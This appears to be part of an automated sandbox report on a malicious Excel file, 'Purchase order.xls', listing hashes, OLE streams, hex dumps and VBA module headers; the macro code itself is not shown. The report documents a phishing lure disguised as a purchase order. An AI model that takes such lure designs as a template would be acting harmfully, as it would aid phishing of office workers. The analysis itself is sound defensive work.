                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:false
                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:51:02 2024, Security: 1
                                                                                            Category:dropped
                                                                                            Size (bytes):1072128
                                                                                            Entropy (8bit):7.365514454019629
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:XmzHJEyfN1YpNBPF39MZEAD3DERnLRmF8DcGLq6DrI2CxKvsWBJWk5klsRx1EYNN:+hfgp531AbARM8wgqISK5JZils71B
                                                                                            MD5:50A169B3A84611E2A50546C48C417A4C
                                                                                            SHA1:3807B542FAFFB066F25864BE1A318832F962D1C0
                                                                                            SHA-256:F8BFD91A161A81CEF44C2361382F139C2F9C5B178E4FED987BAED6CE9A9E3BE9
                                                                                            SHA-512:B2143FF6E76AFA18239C5AC459C66CC70723ECFAAEF6755FD7FF2279747F110E3020FD521334E896B7B41E98DF16316B2F911515CF0E2E0F9909732C014AD91A
                                                                                            Malicious:true
                                                                                            Preview:......................>.......................................................................7...............................c.......e................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 05:30:22 2024, Security: 1
                                                                                            Entropy (8bit):7.343246296130872
                                                                                            TrID:
                                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                            File name:Purchase order.xls
                                                                                            File size:1'081'344 bytes
                                                                                            MD5:a8e1c0126304e8d65c0a30873dc3d830
                                                                                            SHA1:a0b52e51d227a126c1bc85b057482a58b028ed88
                                                                                            SHA256:c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b
                                                                                            SHA512:87ec45bd80a0b29c11900946b892134a636b6806ca87b9bce7fbbc52bfbd680436f73c61b6ce51a661b2b179cdf18577617267b68aab43a5f0f425e217f443cd
                                                                                            SSDEEP:12288:0mzHJEyfN1YpuBPP39sZEVD3DERnLRmF8DCO9auag9riz5+w3Z6VM0f3kobnY1lR:Hhfgp83hVbARM8+wa5ESZUF8nN
                                                                                            TLSH:4835AEC3AA198F66ED560230A6F3876A6724CC83C522472F12F4772839F77D4255AF8D
                                                                                            File Content Preview:........................>.......................................................................7...............................c.......e......................................................................................................................
                                                                                            Icon Hash:276ea3a6a6b7bfbf
                                                                                            Document Type:OLE
                                                                                            Number of OLE Files:1
                                                                                            Has Summary Info:
                                                                                            Application Name:Microsoft Excel
                                                                                            Encrypted Document:True
                                                                                            Contains Word Document Stream:False
                                                                                            Contains Workbook/Book Stream:True
                                                                                            Contains PowerPoint Document Stream:False
                                                                                            Contains Visio Document Stream:False
                                                                                            Contains ObjectPool Stream:False
                                                                                            Flash Objects Count:0
                                                                                            Contains VBA Macros:True
                                                                                            Code Page:1252
                                                                                            Author:
                                                                                            Last Saved By:
                                                                                            Create Time:2006-09-16 00:00:00
                                                                                            Last Saved Time:2024-10-25 04:30:22
                                                                                            Creating Application:Microsoft Excel
                                                                                            Security:1
                                                                                            Document Code Page:1252
                                                                                            Thumbnail Scaling Desired:False
                                                                                            Contains Dirty Links:False
                                                                                            Shared Document:False
                                                                                            Changed Hyperlinks:False
                                                                                            Application Version:786432
                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                            VBA File Name:Sheet1.cls
                                                                                            Stream Size:977
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 e . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8f 38 65 f2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Attribute VB_Name = "Sheet1"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                            VBA File Name:Sheet2.cls
                                                                                            Stream Size:977
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 D . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8f 38 44 17 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Attribute VB_Name = "Sheet2"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                            VBA File Name:Sheet3.cls
                                                                                            Stream Size:977
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 _ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8f 38 f1 5f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Attribute VB_Name = "Sheet3"
                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                            VBA File Name:ThisWorkbook.cls
                                                                                            Stream Size:985
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 v . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 8f 38 76 b7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Attribute VB_Name = "ThisWorkbook"
                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                            Attribute VB_GlobalNameSpace = False
                                                                                            Attribute VB_Creatable = False
                                                                                            Attribute VB_PredeclaredId = True
                                                                                            Attribute VB_Exposed = True
                                                                                            Attribute VB_TemplateDerived = False
                                                                                            Attribute VB_Customizable = True
                                                                                            

                                                                                            General
                                                                                            Stream Path:\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.25248375192737
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:244
                                                                                            Entropy:2.889430592781307
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                            General
                                                                                            Stream Path:\x5SummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:200
                                                                                            Entropy:3.250350317504982
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . & . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.25248375192737
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/\x5DocumentSummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:244
                                                                                            Entropy:2.701136490257069
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/\x5SummaryInformation
                                                                                            CLSID:
                                                                                            File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                            Stream Size:90976
                                                                                            Entropy:4.0202822243037755
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . % . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD0002578E/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.219515110876372
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD0002578E/Package
                                                                                            CLSID:
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Stream Size:33181
                                                                                            Entropy:7.705040299215262
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:P K . . . . . . . . . . ! . ) ; . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e2 9b 29 3b aa 01 00 00 e0 07 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD00032715/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:99
                                                                                            Entropy:3.631242196770981
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD00032715/Package
                                                                                            CLSID:
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Stream Size:38341
                                                                                            Entropy:7.85773182578822
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD00032B6D/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.25248375192737
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD00032B6D/\x5DocumentSummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:484
                                                                                            Entropy:3.922883556049869
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD00032B6D/\x5SummaryInformation
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:19956
                                                                                            Entropy:3.047871976270467
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . . . % . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . .
                                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD00032B6D/Workbook
                                                                                            CLSID:
                                                                                            File Type:Applesoft BASIC program data, first line number 16
                                                                                            Stream Size:95624
                                                                                            Entropy:3.890268972586762
                                                                                            Base64 Encoded:True
                                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
                                                                                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD00033186/\x1CompObj
                                                                                            CLSID:
                                                                                            File Type:data
                                                                                            Stream Size:114
                                                                                            Entropy:4.219515110876372
                                                                                            Base64 Encoded:False
                                                                                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            General
                                                                                            Stream Path:MBD000EE996/MBD00033186/Package
                                                                                            CLSID:
                                                                                            File Type:Microsoft Excel 2007+
                                                                                            Stream Size:52190
                                                                                            Entropy:7.870757596146126
                                                                                            Base64 Encoded:True
